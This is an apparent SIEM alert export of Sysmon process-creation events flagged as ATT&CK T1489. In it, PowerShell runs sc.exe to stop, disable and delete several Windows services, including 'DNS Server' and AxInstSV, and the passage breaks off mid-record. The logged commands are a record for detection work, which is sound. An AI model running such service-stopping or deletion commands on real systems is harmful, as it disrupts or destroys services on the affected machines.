+ProcessId: 8068 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop "".Net CLR"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \"".Net CLR\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:05.006487600Z"",""eventRecordID"":""3518"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:04.999\r\nProcessGuid: {df9fc3d3-b3f4-5ecf-0000-001074a82e00}\r\nProcessId: 8068\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \"".Net CLR\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:04.999"",""processGuid"":""{df9fc3d3-b3f4-5ecf-0000-001074a82e00}"",""processId"":""8068"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\"".Net CLR\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:33.923",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:04.924 +ProcessGuid: {df9fc3d3-b3f4-5ecf-0000-0010cba42e00} +ProcessId: 8092 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SuperProServer +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SuperProServer",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:04.928841700Z"",""eventRecordID"":""3515"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:04.924\r\nProcessGuid: {df9fc3d3-b3f4-5ecf-0000-0010cba42e00}\r\nProcessId: 8092\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SuperProServer\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:04.924"",""processGuid"":""{df9fc3d3-b3f4-5ecf-0000-0010cba42e00}"",""processId"":""8092"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SuperProServer"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:33.865",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:04.871 +ProcessGuid: {df9fc3d3-b3f4-5ecf-0000-00102da22e00} +ProcessId: 7684 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Serhiez +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Serhiez",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:04.873194900Z"",""eventRecordID"":""3512"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:04.871\r\nProcessGuid: {df9fc3d3-b3f4-5ecf-0000-00102da22e00}\r\nProcessId: 7684\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Serhiez\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:04.871"",""processGuid"":""{df9fc3d3-b3f4-5ecf-0000-00102da22e00}"",""processId"":""7684"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Serhiez"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:33.854",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:04.852 +ProcessGuid: {df9fc3d3-b3f4-5ecf-0000-001056a12e00} +ProcessId: 7796 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config Serhiez Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config Serhiez Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:04.855080900Z"",""eventRecordID"":""3511"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:04.852\r\nProcessGuid: {df9fc3d3-b3f4-5ecf-0000-001056a12e00}\r\nProcessId: 7796\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config Serhiez Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:04.852"",""processGuid"":""{df9fc3d3-b3f4-5ecf-0000-001056a12e00}"",""processId"":""7796"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config Serhiez Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:33.806",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:04.823 +ProcessGuid: {df9fc3d3-b3f4-5ecf-0000-0010ae9f2e00} +ProcessId: 1760 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""DNS Server"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""DNS Server\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:04.825370900Z"",""eventRecordID"":""3509"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:04.823\r\nProcessGuid: {df9fc3d3-b3f4-5ecf-0000-0010ae9f2e00}\r\nProcessId: 1760\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""DNS Server\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:04.823"",""processGuid"":""{df9fc3d3-b3f4-5ecf-0000-0010ae9f2e00}"",""processId"":""1760"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""DNS Server\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:33.758",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:04.778 +ProcessGuid: {df9fc3d3-b3f4-5ecf-0000-00104e9d2e00} +ProcessId: 1088 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Zational +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Zational",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:04.782909900Z"",""eventRecordID"":""3506"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:04.778\r\nProcessGuid: {df9fc3d3-b3f4-5ecf-0000-00104e9d2e00}\r\nProcessId: 1088\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Zational\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:04.778"",""processGuid"":""{df9fc3d3-b3f4-5ecf-0000-00104e9d2e00}"",""processId"":""1088"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Zational"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:33.680",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:04.747 +ProcessGuid: {df9fc3d3-b3f4-5ecf-0000-0010b09b2e00} +ProcessId: 5624 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete AxInstSV +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo 